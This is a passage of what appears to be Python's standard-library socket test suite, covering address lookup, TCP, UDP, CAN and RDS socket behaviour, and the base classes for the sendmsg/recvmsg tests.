b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, _ = tempfile.mkstemp()
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while True:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
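# As an illustration of the scheme described above (not an extra test), a
# concrete class is assembled purely by multiple inheritance; for example,
# further down:
#
#     class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
#                                  SendrecvmsgConnectionlessBase,
#                                  ThreadedSocketTestMixin, UDPTestBase):
#         pass
#
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass
#
# Each generic test then runs unchanged against the cli_sock/serv_sock pair
# that the base classes provide.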
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
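# For example, with the connectionless defaults ([], [], 0, self.serv_addr)
# defined in SendrecvmsgConnectionlessBase below, sendmsgToServer([MSG])
# expands to cli_sock.sendmsg([MSG], [], 0, self.serv_addr).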
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
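# Typical calls from the tests below, for reference:
#
#     self.checkFlags(flags, eor=True)                # complete record/datagram
#     self.checkFlags(flags, eor=False)               # truncated receive
#     self.checkFlags(flags, eor=True,
#                     checkunset=socket.MSG_CTRUNC)   # ancillary data intact
#     self.checkFlags(flags, eor=True,
#                     checkset=socket.MSG_CTRUNC)     # ancillary data truncated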
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
